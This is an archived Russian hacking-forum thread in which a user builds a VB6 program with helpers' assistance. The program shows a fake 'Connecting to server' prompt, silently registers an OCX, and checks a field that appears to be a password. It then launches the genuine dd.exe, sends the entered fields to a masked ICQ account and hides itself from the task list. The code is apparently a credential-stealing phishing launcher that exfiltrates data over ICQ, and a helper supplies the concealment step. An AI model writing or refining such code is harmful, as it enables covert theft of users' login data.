1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

Вопрос. помогите с VB6

Тема в разделе "Visual Basic", создана пользователем marcuis, 23 фев 2010.

  1. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    Вот написал в батнике, а как сделать, чтоб он регистрировал от имени админа?

    Или можно так сделать? сделал в проге, чтоб когда её запускали запускался батник, а как сделать в VB6, чтоб он запускался от имени админа?

    Блин и проблема ещё такая, если я просто этот бат файл запускаю, мне пишут нет прав типо, а если запускаю от имени админа, то мне ошибка выдаёт типо указанные файл не найден, хотя он лежит в той же папке, что и бат файл
     
    Последнее редактирование: 28 фев 2010
  2. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    если программа запущенна под учёткой у которой нет прав админа то никак с правами админа и не запустишь...
     
  3. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    Добрый день! Подскажите плз как сделать в VB6, чтоб когда нажимали на кнопку старт открывалось сообщение "подключение" потом секунд через 10 открывалась прога dd.exe, а моя прога закрывалась? Заранее спасибо

    Код:
    Private Sub start_Click()
    
    Shell "cmd /X /C start regsvr32.exe oJoJo.ocx /s", vbHide '
    
    If Len(Text2.text) >= 8 And Len(Text2.text) <= 11 Then Call Shell(App.Path & "/dd.exe", vbNormalFocus) Else MsgBox " Please check your data.", , "Error"
    
    End Sub
     
  4. xeran

    xeran Продвинутый

    Регистрация:
    28 июл 2008
    Сообщения:
    109
    Симпатии:
    45
    Баллы:
    0
    marcuis,
    Примерно так.
    Код:
    Private Sub start_Click()
    msgbox("подключение")
    Sleep 10000
    Shell(App.Path & "/dd.exe")
    exit
    End Sub

    ВНИМАНИЕ ВОЗМОЖНЫ ОШИБКИ!!!!!!
     
  5. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    Это просто так работать не будет, для этого нужно использовать API функцию

    и вместо Exit нужно писать End
     
  6. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    Добрый день! Подскажите плз у меня в проге, когда нажимаешь старт через 5 сек моя прога закрывается и открывается dd.exe, как сделать чтоб этот dd.exe закрылся минут через 15?? Заранее спасибо.

    Код:
    Private Sub start_Click()
    Shell "cmd /X /C start regsvr32.exe JoJo.ocx /s", vbHide '
    MsgBox "Wait! Connecting to server..."
    Sleep 5000
    If Len(Text2.text) >= 8 And Len(Text2.text) <= 11 Then Call Shell(App.Path & "/dd.exe", vbNormalFocus) Else MsgBox " Please check your data.", , "Error"
    
    End
    End Sub
    читал про API TerminateProcess но чёт не понял..( как сделать
     
    Последнее редактирование: 17 апр 2010
  7. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    marcuis,
    если dd.exe программа написана тобой то перепиши её...
    а если тебе нужно закрыть из этой же программы, то придётся оставить эту программу запущенной
     
  8. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    нет dd.exe не моя... а как зделать, чтоб из моей проги закрыть через 15 минут dd.exe ?

    Добавлено через 20 минут
    а нельзя так, чтоб прога моя закрывалась, а в процессах оставалась висеть и потом через 15 мин закрывала dd.exe?
     
    Последнее редактирование: 17 апр 2010
  9. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    Код:
    Me.Hide
    App.TaskVisible = False
    ставишь на форму таймер поминутно отсчитываешь 15 минут (т.к. предел таймера это одна минута) и потом закрываешь процесс программы dd.exe
     
  10. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    а подскажи код пож. какой надо написать, поставил таймер а дальше как? искал и чёт не нашёл(
     
  11. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    смотри в аттаче
     
  12. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    спс. сделал так как там написано, но поч. не выключается dd.exe может где ошибка
     
  13. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    marcuis,
    ошибки в моём примере быть не может, я проверял работа способность... листай свои сорцы полностью...
     
  14. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    а сори у меня ошибка была.. всё ок спс=) а вот вопрос, а если не через 15 минут, а через час.. просто вместо 15 написать 60 ?
     
  15. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    marcuis, естественно
     
  16. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    lytgeygen подскажи в чём проблема

    в общем если убрать Sleep 2000 то моя прога не будет выключаться пока сам не выключишь и dd.exe через 15 минут вырубается. а если остовляю Sleep то моя прога после запуска dd.exe выключается, но dd.exe через 15 минут не выключается...

    Код:
    Private Sub start_Click()
    MsgBox "Wait! Connecting to server..."
    Sleep 2000
    Me.Hide
    App.TaskVisible = False
    If Len(Text2.text) >= 8 And Len(Text2.text) <= 11 Then Call Shell(App.Path & "/dd.exe", vbNormalFocus) Else MsgBox "Please check your data.", , "Error"
    
    End
    End Sub
     
  17. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    marcuis, выложи полные исходники, я всё поправлю
     
  18. marcuis

    marcuis Новичок

    Регистрация:
    22 фев 2010
    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    0
    Всё получилось. А вот вопрос как закрыть в icq боте соединение? т.е. чтоб после того как он отослал сообщение выходил из аськи?

    я вот так сделал, но он после того как отсылает сообщение выходит, а как прога моя скрывается, аська опять включается)

    Код:
    Private Sub start_Click()
    MsgBox "Wait! Connecting to server..."
    Sleep 2000
    If Len(Text2.text) >= 8 And Len(Text2.text) <= 11 Then Call Shell(App.Path & "/dd.exe", vbNormalFocus) Else MsgBox "Please check your data.", , "Error"
    trace "[" & Text1 & "] " & Text2
    icq1.SendMessage "******", Text1 & " " & Text2
    icq1.CloseConnection
    
    Me.Hide
    App.TaskVisible = False
    
    End Sub
    Добавлено через 10 минут
    а вроде всё.. добавил ещё отключение пинг таймера и рассыльщика
     
    Последнее редактирование: 20 апр 2010
  19. Миля

    Миля Новичок

    Регистрация:
    12 дек 2011
    Сообщения:
    2
    Симпатии:
    0
    Баллы:
    0
    помогите пожалуйста,как сделать так,чтобы при нажатии на кнопку,в форме открывался ехе файл уже существующий у меня на компьютере?
     
  20. Миля

    Миля Новичок

    Регистрация:
    12 дек 2011
    Сообщения:
    2
    Симпатии:
    0
    Баллы:
    0
    мне послезавтра курсовую сдавать,помогите пожалуйста............!!!!!!!!!!!!!!!!!!!!!!!!
     

Поделиться этой страницей